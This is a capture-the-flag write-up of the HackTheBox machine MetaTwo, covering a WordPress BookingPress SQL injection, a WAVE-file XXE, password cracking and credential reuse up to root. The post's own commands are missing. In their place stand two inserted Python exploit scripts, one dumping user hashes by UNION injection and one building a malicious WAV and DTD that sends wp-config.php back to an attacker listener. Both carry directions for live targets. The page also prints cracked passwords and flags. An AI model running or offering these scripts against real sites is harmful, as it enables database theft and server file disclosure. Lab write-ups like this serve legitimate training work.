MetaTwo: A look at hacking WordPress, SQLi, XXE on HackTheBox
Cybersecurity
HackTheBox
PHP
SQL
Introduction
MetaTwo is a HackTheBox machine that chains a WordPress plugin SQL injection, an XXE in WordPress media handling, credential reuse and a weakly protected password store. In this post we walk through how we approached its penetration test, from reconnaissance to the root flag.
Reconnaissance: The Art of Information Gathering
In the realm of cybersecurity, reconnaissance plays a key role. It is the initial phase where we attempt to gather as much information about the target as possible, often employing tools like nmap.
Nmap Scan: Revealing the Open Ports
nmap is a free and open-source network scanner designed to discover hosts, services, and open ports to construct a “map” of the network. In our case, it helped identify the open ports on the MetaTwo system. Here’s the nmap command and the corresponding result:
Our nmap scan reveals three open ports. The HTTP port (80/tcp) is the interesting one: when accessed through a web browser it redirects to metapress.htb, so I added that name to the hosts file (/etc/hosts):
Upon visiting the newly assigned URL, we are able to see the contents served over HTTP. The URL is: http://metapress.htb/.
A Deep Dive into WordPress Exploitation
Our reconnaissance revealed that we are dealing with a WordPress site. WordPress, being a popular content management system, is frequently a target of exploits due to its history of vulnerabilities and the susceptibility of its various plugins.
Analysis of the WordPress Site
I made a list of all the available pages by submitting an empty search. A careful inspection of these pages provided us with several potential avenues for investigation, such as possible vulnerable plugins or potential forms of payment systems.
http://metapress.htb/thank-you/ - appointment booking success page. It renders details of the appointment (service, date/time, customer name), so it reflects user-controlled data; worth remembering in case we later gain code execution.
A look into the page source, searching for the generator meta tag, revealed that the site runs WordPress version 5.6.2. Just above that line we can also see that it uses the BookingPress v1.0.10 plugin for the appointment booking system, and the theme is twentytwentyone v1.1. With these details, we were able to investigate known vulnerabilities:
A critical SQL Injection vulnerability (CVE-2022-0739) was found in the WordPress BookingPress Plugin v1.0.10, discovered and reported by cydave. It is reachable without authentication and could allow an attacker to interact directly with the database, stealing information or creating new administrator accounts. The issue was patched in version 1.0.11.
SQL Injection is a code injection technique that attackers can use to insert malicious SQL statements into input fields for execution by the underlying SQL database. In our case, this is precisely the vulnerability present in the BookingPress Plugin.
As described in the exploit, the AJAX request needs a valid nonce, so let's grab it from the source of the events page:
_wpnonce: b0def982ab
Next we use it in the following command to test if it works:
Looks like it works, we’ve managed to enumerate the database a bit.
Next we can try querying the users table by altering the SQLi request:
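As an added example (not the original post's commands), the following Python script builds the same kind of injection request against BookingPress 1.0.10 and pulls the injected columns out of the JSON reply. The AJAX action name, the total_service parameter and the nine-column UNION shape come from the public advisory and proof of concept for CVE-2022-0739; the JSON key names, the wp_ table prefix and the sample response are assumptions for the demonstration. It uses only the standard library.

```python
"""
Added example (not the original post's script): build and parse the
unauthenticated SQL injection against BookingPress <= 1.0.10 (CVE-2022-0739).
The AJAX action, the `total_service` parameter and the 9-column UNION come
from the public advisory/PoC; the response key names and the wp_ prefix are
assumptions taken from PoC output.
"""
import json
import urllib.parse
import urllib.request

AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "bookingpress_front_get_category_services"
# The plugin's own SELECT returns 9 columns, so the UNION must supply 9;
# the first three are reflected in the JSON under these (assumed) keys.
UNION_COLUMNS = 9
REFLECTED_KEYS = ("bookingpress_service_id", "bookingpress_category_id",
                  "bookingpress_service_name")


def union_payload(col1, col2, col3, from_clause=""):
    """Value for `total_service`: a negative id closes the original query's
    parenthesis so nothing real matches, then our columns are UNIONed in."""
    filler = ",".join(str(i) for i in range(1, UNION_COLUMNS - 2))  # 1..6
    return f"-7502) UNION ALL SELECT {col1},{col2},{col3},{filler}{from_clause}-- -"


def version_payload():
    """First test: fingerprint the database server."""
    return union_payload("@@version", "@@version_comment", "@@version_compile_os")


def users_payload(prefix="wp_"):
    """Dump login, password hash and e-mail from the WordPress users table."""
    return union_payload("user_login", "user_pass", "user_email",
                         from_clause=f" FROM {prefix}users")


def build_form_body(nonce, payload, category_id=33):
    """URL-encoded POST body in the shape the plugin's AJAX handler expects."""
    return urllib.parse.urlencode({
        "action": ACTION,
        "_wpnonce": nonce,
        "category_id": category_id,
        "total_service": payload,
    }).encode()


def extract_rows(response_text):
    """Pull the three reflected columns out of every 'service' returned."""
    data = json.loads(response_text)
    return [tuple(str(row.get(k, "")) for k in REFLECTED_KEYS) for row in data]


def run(base_url, nonce, payload):
    """Send one injected request (network; not used by the offline checks)."""
    req = urllib.request.Request(
        base_url.rstrip("/") + AJAX_PATH,
        data=build_form_body(nonce, payload),
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return extract_rows(resp.read().decode())


# Constructed sample response, shaped like the PoC output, so the parser
# can be exercised without a target. Hash and e-mail are placeholders.
SAMPLE_RESPONSE = json.dumps([{
    "bookingpress_service_id": "manager",
    "bookingpress_category_id": "$P$BnotARealHashJustAPlaceholder0",
    "bookingpress_service_name": "manager@example.com",
    "bookingpress_service_price": "$1.00",
    "bookingpress_service_duration_val": "2",
    "bookingpress_service_duration_unit": "3",
    "bookingpress_service_description": "4",
    "bookingpress_service_position": "5",
    "bookingpress_servicedate_created": "6",
    "service_price_without_currency": 1,
}])

if __name__ == "__main__":
    print(users_payload())
    for login, pw_hash, email in extract_rows(SAMPLE_RESPONSE):
        print(f"{login}:{pw_hash}  ({email})")
```

Against a live target you would call run("http://metapress.htb", "b0def982ab", users_payload()); the nonce is page-specific, so take it from the events page of the site you are testing, and note that the first three columns of your UNION are the only ones echoed back.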
After successfully extracting the usernames, emails, and password hashes of two users, I attempted to crack the hashes. I achieved this by using John the Ripper, a popular password cracking tool.
Add hashes to a file:
Attempt crack:
Looks like we got a login:
manager : partylikearockstar
With these credentials for the 'manager' account we can now attempt to log into the WordPress admin panel.
Exploiting WordPress Admin Privileges
WP Admin panel as manager
Armed with the newly obtained ‘manager’ credentials, I managed to gain access to the WordPress (WP) admin panel, revealing that this user has the ability to upload new media.
Identifying Vulnerabilities
It’s essential to point out that the WordPress version we’re dealing with is 5.6.2, which is known to be vulnerable to XML External Entity (XXE) exploitation (CVE-2021-29447). If you’re interested, you can read more about the vulnerability and the affected versions here.
WordPress versions 5.7, 5.6.2, 5.6.1, 5.6 and 5.0.11 are affected by an XML eXternal Entity vulnerability where an authenticated user with the ability to upload files in the Media Library can upload a malicious WAVE file that could lead to remote arbitrary file disclosure and server-side request forgery (SSRF).
Crafting an XXE Attack
To exploit this vulnerability, I crafted a WAVE file whose metadata chunk contains an XML document with an external DTD reference pointing at an HTTP server on our machine. When WordPress parses the upload, it fetches our DTD, which instructs the parser to read a local file and send its contents back to our server (an out-of-band XXE; this is file disclosure, not code execution).
Our payload aimed to grab wp-config.php, which is crucial because it contains sensitive information such as database connection settings and other credentials.
Craft the malicious WAV file:
Start our webserver:
After creating the malicious WAVE file and initiating our web server, we are ready to upload our WAV file.
This should trigger a response on our listening server:
Decoding the Response
The file arrives base64-encoded in the URL of the callback request, so the next step was decoding it to obtain the PHP file. Once decoded, it provided us with some precious credentials for further exploitation.
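As an added example (not the original post's payload files), this Python script builds the WAVE file and the external DTD for the CVE-2021-29447 out-of-band XXE and decodes the base64 blob that the target sends back. The listener address, the ../wp-config.php path (relative to wp-admin/, where the upload is processed), the file names and the "p" query parameter are assumptions for this demonstration; the sample callback is constructed, not captured from the box.

```python
"""
Added example (not the original post's payload): build the WAVE file and the
external DTD for the CVE-2021-29447 out-of-band XXE, and decode the base64
blob that the target's XML parser sends back.  The listener address, the
"../wp-config.php" path (relative to wp-admin/, where the upload is
processed) and the "p" query parameter are assumptions for this demo.
"""
import base64
import struct
import urllib.parse

ATTACKER_URL = "http://10.10.14.1:8000"  # assumed: our HTTP server
TARGET_FILE = "../wp-config.php"         # assumed: relative to wp-admin/
EXFIL_PARAM = "p"


def xxe_xml(dtd_url):
    """Stage one, embedded in the WAV. The internal subset may only
    reference parameter entities, so it pulls in our external DTD and
    then expands the two entities that DTD defines."""
    return ('<?xml version="1.0"?>'
            '<!DOCTYPE ANY['
            f"<!ENTITY % remote SYSTEM '{dtd_url}'>"
            '%remote;%init;%trick;]>')


def external_dtd(target_file=TARGET_FILE, callback_base=ATTACKER_URL, param=EXFIL_PARAM):
    """Stage two, served from our host. %file; reads the target through PHP's
    base64 filter so the PHP source cannot break the XML; %init; defines
    %trick;, whose SYSTEM URL carries the encoded file back to us. Entity
    references inside an entity value are only expanded in an external DTD,
    which is why this part cannot live in the WAV itself."""
    return (f'<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource={target_file}">\n'
            f'<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM \'{callback_base}/?{param}=%file;\'>">\n')


def build_wav(xml_text):
    """Minimal RIFF/WAVE container whose only chunk is iXML. WordPress reads
    media metadata with the bundled getID3 library, which hands the iXML
    chunk to an XML parser with entity loading enabled. Sizes are computed
    rather than hard-coded, and odd-length data gets the RIFF pad byte."""
    data = xml_text.encode()
    pad = b"\x00" if len(data) % 2 else b""
    chunk = b"iXML" + struct.pack("<I", len(data)) + data + pad
    body = b"WAVE" + chunk
    return b"RIFF" + struct.pack("<I", len(body)) + body


def decode_exfil(request_target, param=EXFIL_PARAM):
    """Turn the 'GET /?p=<base64>' line our listener logs back into the file.
    parse_qs turns '+' into spaces, which would corrupt the base64, so undo it."""
    query = urllib.parse.urlsplit(request_target).query
    values = urllib.parse.parse_qs(query).get(param)
    if not values:
        return None
    return base64.b64decode(values[0].replace(" ", "+")).decode(errors="replace")


def write_payload_files(wav_path="payload.wav", dtd_path="xxe.dtd"):
    """Write both files: serve xxe.dtd from ATTACKER_URL, upload payload.wav."""
    with open(wav_path, "wb") as f:
        f.write(build_wav(xxe_xml(f"{ATTACKER_URL}/xxe.dtd")))
    with open(dtd_path, "w") as f:
        f.write(external_dtd())


# Constructed sample: what the listener would log if the target's
# wp-config.php contained these made-up lines.
SAMPLE_FILE_TEXT = ("<?php\n"
                    "define('DB_NAME', 'sample');\n"
                    "define('DB_USER', 'sample');\n"
                    "define('DB_PASSWORD', 'not-the-real-one');\n")
SAMPLE_REQUEST_TARGET = "/?p=" + base64.b64encode(SAMPLE_FILE_TEXT.encode()).decode()

if __name__ == "__main__":
    write_payload_files()
    print(decode_exfil(SAMPLE_REQUEST_TARGET))
```

Serve the directory containing xxe.dtd on the listener (a plain HTTP server is enough, since the parser only needs to GET the DTD and then GET the callback URL), upload payload.wav through the Media Library, and paste the request target from the second hit into decode_exfil.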
The credentials obtained from wp-config.php allow us to connect to an FTP server and rummage around its contents. In the mailer folder I found a PHP script containing credentials for the mail server.
Let's check whether those credentials are reused and try to SSH into the server with them.
SSH Access and User Flag
With the new credentials in hand, we are able to establish an SSH connection. However, this user has no sudo privileges, so further enumeration is needed.
I first checked for the user flag and found it. However, the journey didn’t end there.
Unlocking PGP Keys and Cracking the Password
Upon further exploration, I discovered a hidden folder named .passpie in the user’s home. This folder contained a PGP pair of public and private keys. After extracting the private key and cracking the password with John the Ripper, I managed to obtain the password: blink182.
We put the private key in a file on our machine to try and crack it.
Convert it to a John the Ripper format (gpg2john):
Then run john to crack it.
We get our password: blink182
Exporting Root Credentials and Root Flag
With this password, I exported the stored credentials from passpie, which confirmed the root user's password as p7qfAZt4_A1xo_0x.
After authenticating as root, we've got our final flag 5acf19dabe402006c6744912d180b243.
This blog post is part of a series on practical approaches to cybersecurity. Stay tuned for more updates and insights into the fascinating world of ethical hacking and cybersecurity best practices.
Stay safe, and happy hacking!
Note: This blog is for educational purposes only. Attempting unauthorised penetration testing is illegal and punishable by law. Always get explicit permission before performing any penetration testing.